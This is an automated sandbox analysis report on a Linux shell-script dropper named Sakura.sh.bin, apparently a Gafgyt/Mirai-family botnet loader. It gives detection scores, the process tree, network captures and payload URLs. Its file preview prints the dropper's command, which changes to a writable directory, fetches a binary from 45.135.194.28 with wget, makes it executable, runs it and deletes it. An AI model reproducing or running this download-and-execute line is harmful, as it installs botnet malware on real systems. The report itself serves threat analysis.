Edit tour

Linux Analysis Report
Sakura.sh.bin

Overview

General Information

Sample name:Sakura.sh.bin
Analysis ID:1641762
MD5:57f1041fd8cdcbb4c369bb68bfd99db8
SHA1:15df867f11dbdfc5500cd0b4a750ab5b0f861a92
SHA256:6e2512f6f74cc6228d5925dda1324b5a81c7e70fa8505f1f4cee5140b1fc5380
Infos:

Detection

Score:64
Range:0 - 100

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Yara detected ShellDownloader
Executes the "wget" command typically used for HTTP/S downloading
Uses the "uname" system call to query kernel version information (possible evasion)

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious
Joe Sandbox version:42.0.0 Malachite
Analysis ID:1641762
Start date and time:2025-03-18 13:37:07 +01:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 7m 30s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 16.04 x64 (Kernel 4.4.0-116, Firefox 88.0, Document Viewer 3.18.2, LibreOffice 5.1.6.2, OpenJDK 1.8.0_171)
Analysis Mode:default
Sample name:Sakura.sh.bin
Detection:MAL
Classification:mal64.troj.linBIN@0/0@0/0
  • VT rate limit hit for: http://45.135.194.28/a-r.m-7.Sakura;
  • VT rate limit hit for: http://45.135.194.28/m-p.s-l.Sakura;
  • VT rate limit hit for: http://45.135.194.28/p-p.c-.Sakura;
Command:bash "/tmp/Sakura.sh.bin"
PID:4717
Exit Code:
Exit Code Info:
Killed:True
Standard Output:

Standard Error:--2025-03-18 07:37:46-- http://45.135.194.28/m-i.p-s.Sakura
Connecting to 45.135.194.28:80... connected.
HTTP request sent, awaiting response... No data received.
Retrying.

--2025-03-18 07:37:49-- (try: 2) http://45.135.194.28/m-i.p-s.Sakura
Connecting to 45.135.194.28:80... connected.
HTTP request sent, awaiting response... No data received.
Retrying.

--2025-03-18 07:37:52-- (try: 3) http://45.135.194.28/m-i.p-s.Sakura
Connecting to 45.135.194.28:80... connected.
HTTP request sent, awaiting response... No data received.
Retrying.

--2025-03-18 07:37:57-- (try: 4) http://45.135.194.28/m-i.p-s.Sakura
Connecting to 45.135.194.28:80... connected.
HTTP request sent, awaiting response... No data received.
Retrying.

--2025-03-18 07:38:03-- (try: 5) http://45.135.194.28/m-i.p-s.Sakura
Connecting to 45.135.194.28:80... connected.
HTTP request sent, awaiting response... No data received.
Retrying.

--2025-03-18 07:38:09-- (try: 6) http://45.135.194.28/m-i.p-s.Sakura
Connecting to 45.135.194.28:80... connected.
HTTP request sent, awaiting response... No data received.
Retrying.

--2025-03-18 07:38:17-- (try: 7) http://45.135.194.28/m-i.p-s.Sakura
Connecting to 45.135.194.28:80... connected.
HTTP request sent, awaiting response... No data received.
Retrying.

--2025-03-18 07:38:26-- (try: 8) http://45.135.194.28/m-i.p-s.Sakura
Connecting to 45.135.194.28:80... connected.
HTTP request sent, awaiting response... No data received.
Retrying.
  • system is lnxubuntu1
  • bash (PID: 4717, Parent: 4620, MD5: 5e666695cf08d1638bb85684e30185ee) Arguments: /bin/bash /tmp/Sakura.sh.bin
    • bash New Fork (PID: 4722, Parent: 4717)
    • wget (PID: 4722, Parent: 4717, MD5: acaead6d3c5bcc35a12ab496fa834365) Arguments: wget http://45.135.194.28/m-i.p-s.Sakura
  • cleanup
SourceRuleDescriptionAuthorStrings
Sakura.sh.binJoeSecurity_ShellDownloaderYara detected ShellDownloaderJoe Security
    No Suricata rule has matched

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Source: Sakura.sh.binAvira: detected
    Source: Sakura.sh.binVirustotal: Detection: 64%Perma Link
    Source: Sakura.sh.binReversingLabs: Detection: 70%
    Source: /bin/bash (PID: 4722)Wget executable: /usr/bin/wget -> wget http://45.135.194.28/m-i.p-s.SakuraJump to behavior
    Source: unknownTCP traffic detected without corresponding DNS query: 45.135.194.28
    Source: unknownTCP traffic detected without corresponding DNS query: 45.135.194.28
    Source: unknownTCP traffic detected without corresponding DNS query: 45.135.194.28
    Source: unknownTCP traffic detected without corresponding DNS query: 45.135.194.28
    Source: unknownTCP traffic detected without corresponding DNS query: 45.135.194.28
    Source: unknownTCP traffic detected without corresponding DNS query: 45.135.194.28
    Source: unknownTCP traffic detected without corresponding DNS query: 45.135.194.28
    Source: unknownTCP traffic detected without corresponding DNS query: 45.135.194.28
    Source: unknownTCP traffic detected without corresponding DNS query: 45.135.194.28
    Source: unknownTCP traffic detected without corresponding DNS query: 45.135.194.28
    Source: unknownTCP traffic detected without corresponding DNS query: 45.135.194.28
    Source: unknownTCP traffic detected without corresponding DNS query: 45.135.194.28
    Source: unknownTCP traffic detected without corresponding DNS query: 45.135.194.28
    Source: unknownTCP traffic detected without corresponding DNS query: 45.135.194.28
    Source: unknownTCP traffic detected without corresponding DNS query: 45.135.194.28
    Source: unknownTCP traffic detected without corresponding DNS query: 45.135.194.28
    Source: unknownTCP traffic detected without corresponding DNS query: 45.135.194.28
    Source: unknownTCP traffic detected without corresponding DNS query: 45.135.194.28
    Source: unknownTCP traffic detected without corresponding DNS query: 45.135.194.28
    Source: unknownTCP traffic detected without corresponding DNS query: 45.135.194.28
    Source: unknownTCP traffic detected without corresponding DNS query: 45.135.194.28
    Source: unknownTCP traffic detected without corresponding DNS query: 45.135.194.28
    Source: unknownTCP traffic detected without corresponding DNS query: 45.135.194.28
    Source: unknownTCP traffic detected without corresponding DNS query: 45.135.194.28
    Source: unknownTCP traffic detected without corresponding DNS query: 45.135.194.28
    Source: unknownTCP traffic detected without corresponding DNS query: 45.135.194.28
    Source: unknownTCP traffic detected without corresponding DNS query: 45.135.194.28
    Source: unknownTCP traffic detected without corresponding DNS query: 45.135.194.28
    Source: unknownTCP traffic detected without corresponding DNS query: 45.135.194.28
    Source: unknownTCP traffic detected without corresponding DNS query: 45.135.194.28
    Source: unknownTCP traffic detected without corresponding DNS query: 45.135.194.28
    Source: unknownTCP traffic detected without corresponding DNS query: 45.135.194.28
    Source: unknownTCP traffic detected without corresponding DNS query: 45.135.194.28
    Source: unknownTCP traffic detected without corresponding DNS query: 45.135.194.28
    Source: unknownTCP traffic detected without corresponding DNS query: 45.135.194.28
    Source: unknownTCP traffic detected without corresponding DNS query: 45.135.194.28
    Source: unknownTCP traffic detected without corresponding DNS query: 45.135.194.28
    Source: unknownTCP traffic detected without corresponding DNS query: 45.135.194.28
    Source: unknownTCP traffic detected without corresponding DNS query: 45.135.194.28
    Source: unknownTCP traffic detected without corresponding DNS query: 45.135.194.28
    Source: unknownTCP traffic detected without corresponding DNS query: 45.135.194.28
    Source: unknownTCP traffic detected without corresponding DNS query: 45.135.194.28
    Source: unknownTCP traffic detected without corresponding DNS query: 45.135.194.28
    Source: unknownTCP traffic detected without corresponding DNS query: 45.135.194.28
    Source: unknownTCP traffic detected without corresponding DNS query: 45.135.194.28
    Source: unknownTCP traffic detected without corresponding DNS query: 45.135.194.28
    Source: unknownTCP traffic detected without corresponding DNS query: 45.135.194.28
    Source: unknownTCP traffic detected without corresponding DNS query: 45.135.194.28
    Source: unknownTCP traffic detected without corresponding DNS query: 45.135.194.28
    Source: unknownTCP traffic detected without corresponding DNS query: 45.135.194.28
    Source: global trafficHTTP traffic detected: GET /m-i.p-s.Sakura HTTP/1.1User-Agent: Wget/1.17.1 (linux-gnu)Accept: */*Accept-Encoding: identityHost: 45.135.194.28Connection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /m-i.p-s.Sakura HTTP/1.1User-Agent: Wget/1.17.1 (linux-gnu)Accept: */*Accept-Encoding: identityHost: 45.135.194.28Connection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /m-i.p-s.Sakura HTTP/1.1User-Agent: Wget/1.17.1 (linux-gnu)Accept: */*Accept-Encoding: identityHost: 45.135.194.28Connection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /m-i.p-s.Sakura HTTP/1.1User-Agent: Wget/1.17.1 (linux-gnu)Accept: */*Accept-Encoding: identityHost: 45.135.194.28Connection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /m-i.p-s.Sakura HTTP/1.1User-Agent: Wget/1.17.1 (linux-gnu)Accept: */*Accept-Encoding: identityHost: 45.135.194.28Connection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /m-i.p-s.Sakura HTTP/1.1User-Agent: Wget/1.17.1 (linux-gnu)Accept: */*Accept-Encoding: identityHost: 45.135.194.28Connection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /m-i.p-s.Sakura HTTP/1.1User-Agent: Wget/1.17.1 (linux-gnu)Accept: */*Accept-Encoding: identityHost: 45.135.194.28Connection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /m-i.p-s.Sakura HTTP/1.1User-Agent: Wget/1.17.1 (linux-gnu)Accept: */*Accept-Encoding: identityHost: 45.135.194.28Connection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /m-i.p-s.Sakura HTTP/1.1User-Agent: Wget/1.17.1 (linux-gnu)Accept: */*Accept-Encoding: identityHost: 45.135.194.28Connection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /m-i.p-s.Sakura HTTP/1.1User-Agent: Wget/1.17.1 (linux-gnu)Accept: */*Accept-Encoding: identityHost: 45.135.194.28Connection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /m-i.p-s.Sakura HTTP/1.1User-Agent: Wget/1.17.1 (linux-gnu)Accept: */*Accept-Encoding: identityHost: 45.135.194.28Connection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /m-i.p-s.Sakura HTTP/1.1User-Agent: Wget/1.17.1 (linux-gnu)Accept: */*Accept-Encoding: identityHost: 45.135.194.28Connection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /m-i.p-s.Sakura HTTP/1.1User-Agent: Wget/1.17.1 (linux-gnu)Accept: */*Accept-Encoding: identityHost: 45.135.194.28Connection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /m-i.p-s.Sakura HTTP/1.1User-Agent: Wget/1.17.1 (linux-gnu)Accept: */*Accept-Encoding: identityHost: 45.135.194.28Connection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /m-i.p-s.Sakura HTTP/1.1User-Agent: Wget/1.17.1 (linux-gnu)Accept: */*Accept-Encoding: identityHost: 45.135.194.28Connection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /m-i.p-s.Sakura HTTP/1.1User-Agent: Wget/1.17.1 (linux-gnu)Accept: */*Accept-Encoding: identityHost: 45.135.194.28Connection: Keep-Alive
    Source: Sakura.sh.binString found in binary or memory: http://45.135.194.28/a-r.m-4.Sakura;
    Source: Sakura.sh.binString found in binary or memory: http://45.135.194.28/a-r.m-5.Sakura;
    Source: Sakura.sh.binString found in binary or memory: http://45.135.194.28/a-r.m-6.Sakura;
    Source: Sakura.sh.binString found in binary or memory: http://45.135.194.28/a-r.m-7.Sakura;
    Source: Sakura.sh.binString found in binary or memory: http://45.135.194.28/i-5.8-6.Sakura;
    Source: Sakura.sh.binString found in binary or memory: http://45.135.194.28/m-6.8-k.Sakura;
    Source: Sakura.sh.binString found in binary or memory: http://45.135.194.28/m-i.p-s.Sakura;
    Source: Sakura.sh.binString found in binary or memory: http://45.135.194.28/m-p.s-l.Sakura;
    Source: Sakura.sh.binString found in binary or memory: http://45.135.194.28/p-p.c-.Sakura;
    Source: Sakura.sh.binString found in binary or memory: http://45.135.194.28/s-h.4-.Sakura;
    Source: Sakura.sh.binString found in binary or memory: http://45.135.194.28/x-3.2-.Sakura;
    Source: Sakura.sh.binString found in binary or memory: http://45.135.194.28/x-8.6-.Sakura;

    System Summary

    barindex
    Source: Yara matchFile source: Sakura.sh.bin, type: SAMPLE
    Source: classification engineClassification label: mal64.troj.linBIN@0/0@0/0
    Source: /bin/bash (PID: 4722)Wget executable: /usr/bin/wget -> wget http://45.135.194.28/m-i.p-s.SakuraJump to behavior
    Source: /bin/bash (PID: 4717)Queries kernel information via 'uname': Jump to behavior
    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
    Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management InstrumentationPath InterceptionPath InterceptionDirect Volume AccessOS Credential Dumping1
    Security Software Discovery
    Remote ServicesData from Local System1
    Non-Application Layer Protocol
    Exfiltration Over Other Network MediumAbuse Accessibility Features
    CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsRootkitLSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media11
    Application Layer Protocol
    Exfiltration Over BluetoothNetwork Denial of Service
    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive1
    Ingress Tool Transfer
    Automated ExfiltrationData Encrypted for Impact
    No configs have been found
    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Number of created Files
    • Is malicious
    • Internet
    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1641762 Sample: Sakura.sh.bin Startdate: 18/03/2025 Architecture: LINUX Score: 64 11 45.135.194.28, 55108, 55110, 55112 SKYLINKCZ Germany 2->11 13 Antivirus / Scanner detection for submitted sample 2->13 15 Multi AV Scanner detection for submitted file 2->15 17 Yara detected ShellDownloader 2->17 7 bash 2->7         started        signatures3 process4 process5 9 bash wget 7->9         started       
    SourceDetectionScannerLabelLink
    Sakura.sh.bin65%VirustotalBrowse
    Sakura.sh.bin71%ReversingLabsWin32.Trojan.Gafgyt
    Sakura.sh.bin100%AviraLINUX/Dldr.Agent.hlw
    No Antivirus matches
    No Antivirus matches
    No Antivirus matches

    Download Network PCAP: filteredfull

    No contacted domains info
    NameMaliciousAntivirus DetectionReputation
    http://45.135.194.28/m-i.p-s.Sakurafalse
      unknown
      NameSourceMaliciousAntivirus DetectionReputation
      http://45.135.194.28/p-p.c-.Sakura;Sakura.sh.binfalse
        unknown
        http://45.135.194.28/m-p.s-l.Sakura;Sakura.sh.binfalse
          unknown
          http://45.135.194.28/a-r.m-7.Sakura;Sakura.sh.binfalse
            unknown
            http://45.135.194.28/x-3.2-.Sakura;Sakura.sh.binfalse
              unknown
              http://45.135.194.28/m-i.p-s.Sakura;Sakura.sh.binfalse
                unknown
                http://45.135.194.28/m-6.8-k.Sakura;Sakura.sh.binfalse
                  unknown
                  http://45.135.194.28/a-r.m-4.Sakura;Sakura.sh.binfalse
                    unknown
                    http://45.135.194.28/a-r.m-5.Sakura;Sakura.sh.binfalse
                      unknown
                      http://45.135.194.28/s-h.4-.Sakura;Sakura.sh.binfalse
                        unknown
                        http://45.135.194.28/a-r.m-6.Sakura;Sakura.sh.binfalse
                          unknown
                          http://45.135.194.28/i-5.8-6.Sakura;Sakura.sh.binfalse
                            unknown
                            http://45.135.194.28/x-8.6-.Sakura;Sakura.sh.binfalse
                              unknown
                              • No. of IPs < 25%
                              • 25% < No. of IPs < 50%
                              • 50% < No. of IPs < 75%
                              • 75% < No. of IPs
                              IPDomainCountryFlagASNASN NameMalicious
                              45.135.194.28
                              unknownGermany
                              213030SKYLINKCZfalse
                              No context
                              No context
                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              SKYLINKCZna.elfGet hashmaliciousPrometeiBrowse
                              • 45.135.194.29
                              boatnet.arm.elfGet hashmaliciousMiraiBrowse
                              • 45.135.194.29
                              networkrip.mips.elfGet hashmaliciousMirai, GafgytBrowse
                              • 45.135.194.61
                              networkrip.armv7l.elfGet hashmaliciousMirai, GafgytBrowse
                              • 45.135.194.61
                              networkrip.x86.elfGet hashmaliciousMirai, GafgytBrowse
                              • 45.135.194.61
                              networkrip.arm4.elfGet hashmaliciousMirai, GafgytBrowse
                              • 45.135.194.61
                              networkrip.ppc.elfGet hashmaliciousMirai, GafgytBrowse
                              • 45.135.194.61
                              networkrip.arm5.elfGet hashmaliciousMirai, GafgytBrowse
                              • 45.135.194.61
                              networkrip.mpsl.elfGet hashmaliciousMirai, GafgytBrowse
                              • 45.135.194.61
                              networkrip.sparc.elfGet hashmaliciousMirai, GafgytBrowse
                              • 45.135.194.61
                              No context
                              No context
                              No created / dropped files found
                              File type:Bourne-Again shell script, ASCII text executable
                              Entropy (8bit):4.687336061912351
                              TrID:
                              • Linux/UNIX shell script (7007/1) 100.00%
                              File name:Sakura.sh.bin
                              File size:2'098 bytes
                              MD5:57f1041fd8cdcbb4c369bb68bfd99db8
                              SHA1:15df867f11dbdfc5500cd0b4a750ab5b0f861a92
                              SHA256:6e2512f6f74cc6228d5925dda1324b5a81c7e70fa8505f1f4cee5140b1fc5380
                              SHA512:fe018d3aa481c685d6e6b30c982050d33f8901dbe5054ed2d0fa8035353441731fc9255345c454e505492ea075936350bdb33303cdc2d83df2f9f55b80665a56
                              SSDEEP:48:vWd8jhttQdMwYnRV7WT68CwIDL1B5NwITxST:vWd8jhttQdMwYnRV7WT68CwIDBB5NwIw
                              TLSH:BD412BD7119247F32C90DC3772698480F6D4919A9AC6AF4ABEDC3CE448BEDEC7444683
                              File Content Preview:#!/bin/bash.cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://45.135.194.28/m-i.p-s.Sakura; chmod +x m-i.p-s.Sakura; ./m-i.p-s.Sakura; rm -rf m-i.p-s.Sakura.cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://45.135.194.28/

                              Download Network PCAP: filteredfull

                              TimestampSource PortDest PortSource IPDest IP
                              Mar 18, 2025 13:37:47.474900007 CET5510880192.168.2.2045.135.194.28
                              Mar 18, 2025 13:37:47.479726076 CET805510845.135.194.28192.168.2.20
                              Mar 18, 2025 13:37:47.479827881 CET5510880192.168.2.2045.135.194.28
                              Mar 18, 2025 13:37:47.480415106 CET5510880192.168.2.2045.135.194.28
                              Mar 18, 2025 13:37:47.485050917 CET805510845.135.194.28192.168.2.20
                              Mar 18, 2025 13:37:49.177409887 CET805510845.135.194.28192.168.2.20
                              Mar 18, 2025 13:37:49.177768946 CET5510880192.168.2.2045.135.194.28
                              Mar 18, 2025 13:37:49.177984953 CET5510880192.168.2.2045.135.194.28
                              Mar 18, 2025 13:37:49.182638884 CET805510845.135.194.28192.168.2.20
                              Mar 18, 2025 13:37:50.178895950 CET5511080192.168.2.2045.135.194.28
                              Mar 18, 2025 13:37:50.184542894 CET805511045.135.194.28192.168.2.20
                              Mar 18, 2025 13:37:50.184618950 CET5511080192.168.2.2045.135.194.28
                              Mar 18, 2025 13:37:50.185069084 CET5511080192.168.2.2045.135.194.28
                              Mar 18, 2025 13:37:50.190723896 CET805511045.135.194.28192.168.2.20
                              Mar 18, 2025 13:37:52.005737066 CET805511045.135.194.28192.168.2.20
                              Mar 18, 2025 13:37:52.006344080 CET5511080192.168.2.2045.135.194.28
                              Mar 18, 2025 13:37:52.011229992 CET805511045.135.194.28192.168.2.20
                              Mar 18, 2025 13:37:54.007208109 CET5511280192.168.2.2045.135.194.28
                              Mar 18, 2025 13:37:54.012011051 CET805511245.135.194.28192.168.2.20
                              Mar 18, 2025 13:37:54.012068987 CET5511280192.168.2.2045.135.194.28
                              Mar 18, 2025 13:37:54.012506962 CET5511280192.168.2.2045.135.194.28
                              Mar 18, 2025 13:37:54.017153978 CET805511245.135.194.28192.168.2.20
                              Mar 18, 2025 13:37:55.685745001 CET805511245.135.194.28192.168.2.20
                              Mar 18, 2025 13:37:55.686347008 CET5511280192.168.2.2045.135.194.28
                              Mar 18, 2025 13:37:55.691683054 CET805511245.135.194.28192.168.2.20
                              Mar 18, 2025 13:37:58.688395023 CET5511480192.168.2.2045.135.194.28
                              Mar 18, 2025 13:37:58.693160057 CET805511445.135.194.28192.168.2.20
                              Mar 18, 2025 13:37:58.693253040 CET5511480192.168.2.2045.135.194.28
                              Mar 18, 2025 13:37:58.694766998 CET5511480192.168.2.2045.135.194.28
                              Mar 18, 2025 13:37:58.699377060 CET805511445.135.194.28192.168.2.20
                              Mar 18, 2025 13:38:00.314659119 CET805511445.135.194.28192.168.2.20
                              Mar 18, 2025 13:38:00.315243006 CET5511480192.168.2.2045.135.194.28
                              Mar 18, 2025 13:38:00.321449041 CET805511445.135.194.28192.168.2.20
                              Mar 18, 2025 13:38:04.316098928 CET5511680192.168.2.2045.135.194.28
                              Mar 18, 2025 13:38:04.320832014 CET805511645.135.194.28192.168.2.20
                              Mar 18, 2025 13:38:04.320915937 CET5511680192.168.2.2045.135.194.28
                              Mar 18, 2025 13:38:04.322434902 CET5511680192.168.2.2045.135.194.28
                              Mar 18, 2025 13:38:04.327135086 CET805511645.135.194.28192.168.2.20
                              Mar 18, 2025 13:38:05.977113008 CET805511645.135.194.28192.168.2.20
                              Mar 18, 2025 13:38:05.977720976 CET5511680192.168.2.2045.135.194.28
                              Mar 18, 2025 13:38:05.982379913 CET805511645.135.194.28192.168.2.20
                              Mar 18, 2025 13:38:10.978945971 CET5511880192.168.2.2045.135.194.28
                              Mar 18, 2025 13:38:10.983715057 CET805511845.135.194.28192.168.2.20
                              Mar 18, 2025 13:38:10.983788967 CET5511880192.168.2.2045.135.194.28
                              Mar 18, 2025 13:38:10.984224081 CET5511880192.168.2.2045.135.194.28
                              Mar 18, 2025 13:38:10.988822937 CET805511845.135.194.28192.168.2.20
                              Mar 18, 2025 13:38:12.659077883 CET805511845.135.194.28192.168.2.20
                              Mar 18, 2025 13:38:12.659871101 CET5511880192.168.2.2045.135.194.28
                              Mar 18, 2025 13:38:12.664643049 CET805511845.135.194.28192.168.2.20
                              Mar 18, 2025 13:38:18.661252975 CET5512080192.168.2.2045.135.194.28
                              Mar 18, 2025 13:38:18.666095018 CET805512045.135.194.28192.168.2.20
                              Mar 18, 2025 13:38:18.666184902 CET5512080192.168.2.2045.135.194.28
                              Mar 18, 2025 13:38:18.666766882 CET5512080192.168.2.2045.135.194.28
                              Mar 18, 2025 13:38:18.671447039 CET805512045.135.194.28192.168.2.20
                              Mar 18, 2025 13:38:20.366688967 CET805512045.135.194.28192.168.2.20
                              Mar 18, 2025 13:38:20.367285013 CET5512080192.168.2.2045.135.194.28
                              Mar 18, 2025 13:38:20.372900009 CET805512045.135.194.28192.168.2.20
                              Mar 18, 2025 13:38:27.369807959 CET5512280192.168.2.2045.135.194.28
                              Mar 18, 2025 13:38:27.374461889 CET805512245.135.194.28192.168.2.20
                              Mar 18, 2025 13:38:27.374547958 CET5512280192.168.2.2045.135.194.28
                              Mar 18, 2025 13:38:27.376090050 CET5512280192.168.2.2045.135.194.28
                              Mar 18, 2025 13:38:27.382116079 CET805512245.135.194.28192.168.2.20
                              Mar 18, 2025 13:38:29.003300905 CET805512245.135.194.28192.168.2.20
                              Mar 18, 2025 13:38:29.003973961 CET5512280192.168.2.2045.135.194.28
                              Mar 18, 2025 13:38:29.008662939 CET805512245.135.194.28192.168.2.20
                              Mar 18, 2025 13:38:37.005919933 CET5512480192.168.2.2045.135.194.28
                              Mar 18, 2025 13:38:37.010581970 CET805512445.135.194.28192.168.2.20
                              Mar 18, 2025 13:38:37.010668039 CET5512480192.168.2.2045.135.194.28
                              Mar 18, 2025 13:38:37.012166977 CET5512480192.168.2.2045.135.194.28
                              Mar 18, 2025 13:38:37.016792059 CET805512445.135.194.28192.168.2.20
                              Mar 18, 2025 13:38:38.681329966 CET805512445.135.194.28192.168.2.20
                              Mar 18, 2025 13:38:38.681930065 CET5512480192.168.2.2045.135.194.28
                              Mar 18, 2025 13:38:38.686739922 CET805512445.135.194.28192.168.2.20
                              Mar 18, 2025 13:38:47.683984041 CET5512680192.168.2.2045.135.194.28
                              Mar 18, 2025 13:38:47.688776016 CET805512645.135.194.28192.168.2.20
                              Mar 18, 2025 13:38:47.688865900 CET5512680192.168.2.2045.135.194.28
                              Mar 18, 2025 13:38:47.690439939 CET5512680192.168.2.2045.135.194.28
                              Mar 18, 2025 13:38:47.695076942 CET805512645.135.194.28192.168.2.20
                              Mar 18, 2025 13:38:49.397171974 CET805512645.135.194.28192.168.2.20
                              Mar 18, 2025 13:38:49.398107052 CET5512680192.168.2.2045.135.194.28
                              Mar 18, 2025 13:38:49.398925066 CET5512680192.168.2.2045.135.194.28
                              Mar 18, 2025 13:38:49.403548956 CET805512645.135.194.28192.168.2.20
                              Mar 18, 2025 13:38:59.400753975 CET5512880192.168.2.2045.135.194.28
                              Mar 18, 2025 13:38:59.405502081 CET805512845.135.194.28192.168.2.20
                              Mar 18, 2025 13:38:59.405564070 CET5512880192.168.2.2045.135.194.28
                              Mar 18, 2025 13:38:59.406023026 CET5512880192.168.2.2045.135.194.28
                              Mar 18, 2025 13:38:59.410717964 CET805512845.135.194.28192.168.2.20
                              Mar 18, 2025 13:39:01.451893091 CET805512845.135.194.28192.168.2.20
                              Mar 18, 2025 13:39:01.452486992 CET5512880192.168.2.2045.135.194.28
                              Mar 18, 2025 13:39:01.457649946 CET805512845.135.194.28192.168.2.20
                              Mar 18, 2025 13:39:11.455020905 CET5513080192.168.2.2045.135.194.28
                              Mar 18, 2025 13:39:11.459892035 CET805513045.135.194.28192.168.2.20
                              Mar 18, 2025 13:39:11.460010052 CET5513080192.168.2.2045.135.194.28
                              Mar 18, 2025 13:39:11.461536884 CET5513080192.168.2.2045.135.194.28
                              Mar 18, 2025 13:39:11.466226101 CET805513045.135.194.28192.168.2.20
                              Mar 18, 2025 13:39:13.245846033 CET805513045.135.194.28192.168.2.20
                              Mar 18, 2025 13:39:13.246206999 CET5513080192.168.2.2045.135.194.28
                              Mar 18, 2025 13:39:13.246479034 CET5513080192.168.2.2045.135.194.28
                              Mar 18, 2025 13:39:13.252660990 CET805513045.135.194.28192.168.2.20
                              Mar 18, 2025 13:39:23.249154091 CET5513280192.168.2.2045.135.194.28
                              Mar 18, 2025 13:39:23.253962040 CET805513245.135.194.28192.168.2.20
                              Mar 18, 2025 13:39:23.254086971 CET5513280192.168.2.2045.135.194.28
                              Mar 18, 2025 13:39:23.255594969 CET5513280192.168.2.2045.135.194.28
                              Mar 18, 2025 13:39:23.261033058 CET805513245.135.194.28192.168.2.20
                              Mar 18, 2025 13:39:24.894987106 CET805513245.135.194.28192.168.2.20
                              Mar 18, 2025 13:39:24.896806002 CET5513280192.168.2.2045.135.194.28
                              Mar 18, 2025 13:39:24.901552916 CET805513245.135.194.28192.168.2.20
                              Mar 18, 2025 13:39:34.898622036 CET5513480192.168.2.2045.135.194.28
                              Mar 18, 2025 13:39:34.903373957 CET805513445.135.194.28192.168.2.20
                              Mar 18, 2025 13:39:34.903455019 CET5513480192.168.2.2045.135.194.28
                              Mar 18, 2025 13:39:34.903887987 CET5513480192.168.2.2045.135.194.28
                              Mar 18, 2025 13:39:34.908536911 CET805513445.135.194.28192.168.2.20
                              Mar 18, 2025 13:39:36.550884962 CET805513445.135.194.28192.168.2.20
                              Mar 18, 2025 13:39:36.551475048 CET5513480192.168.2.2045.135.194.28
                              Mar 18, 2025 13:39:36.556138992 CET805513445.135.194.28192.168.2.20
                              Mar 18, 2025 13:39:46.552409887 CET5513680192.168.2.2045.135.194.28
                              Mar 18, 2025 13:39:46.557343960 CET805513645.135.194.28192.168.2.20
                              Mar 18, 2025 13:39:46.557442904 CET5513680192.168.2.2045.135.194.28
                              Mar 18, 2025 13:39:46.557913065 CET5513680192.168.2.2045.135.194.28
                              Mar 18, 2025 13:39:46.562519073 CET805513645.135.194.28192.168.2.20
                              Mar 18, 2025 13:39:48.220493078 CET805513645.135.194.28192.168.2.20
                              Mar 18, 2025 13:39:48.221272945 CET5513680192.168.2.2045.135.194.28
                              Mar 18, 2025 13:39:48.226085901 CET805513645.135.194.28192.168.2.20
                              Mar 18, 2025 13:39:58.222266912 CET5513880192.168.2.2045.135.194.28
                              Mar 18, 2025 13:39:58.227008104 CET805513845.135.194.28192.168.2.20
                              Mar 18, 2025 13:39:58.227099895 CET5513880192.168.2.2045.135.194.28
                              Mar 18, 2025 13:39:58.227543116 CET5513880192.168.2.2045.135.194.28
                              Mar 18, 2025 13:39:58.232197046 CET805513845.135.194.28192.168.2.20
                              Mar 18, 2025 13:39:59.865338087 CET805513845.135.194.28192.168.2.20
                              Mar 18, 2025 13:39:59.865920067 CET5513880192.168.2.2045.135.194.28
                              Mar 18, 2025 13:39:59.871133089 CET805513845.135.194.28192.168.2.20
                              • 45.135.194.28
                              Session IDSource IPSource PortDestination IPDestination Port
                              0192.168.2.205510845.135.194.2880
                              TimestampBytes transferredDirectionData
                              Mar 18, 2025 13:37:47.480415106 CET166OUTGET /m-i.p-s.Sakura HTTP/1.1
                              User-Agent: Wget/1.17.1 (linux-gnu)
                              Accept: */*
                              Accept-Encoding: identity
                              Host: 45.135.194.28
                              Connection: Keep-Alive


                              Session IDSource IPSource PortDestination IPDestination Port
                              1192.168.2.205511045.135.194.2880
                              TimestampBytes transferredDirectionData
                              Mar 18, 2025 13:37:50.185069084 CET166OUTGET /m-i.p-s.Sakura HTTP/1.1
                              User-Agent: Wget/1.17.1 (linux-gnu)
                              Accept: */*
                              Accept-Encoding: identity
                              Host: 45.135.194.28
                              Connection: Keep-Alive


                              Session IDSource IPSource PortDestination IPDestination Port
                              2192.168.2.205511245.135.194.2880
                              TimestampBytes transferredDirectionData
                              Mar 18, 2025 13:37:54.012506962 CET166OUTGET /m-i.p-s.Sakura HTTP/1.1
                              User-Agent: Wget/1.17.1 (linux-gnu)
                              Accept: */*
                              Accept-Encoding: identity
                              Host: 45.135.194.28
                              Connection: Keep-Alive


                              Session IDSource IPSource PortDestination IPDestination Port
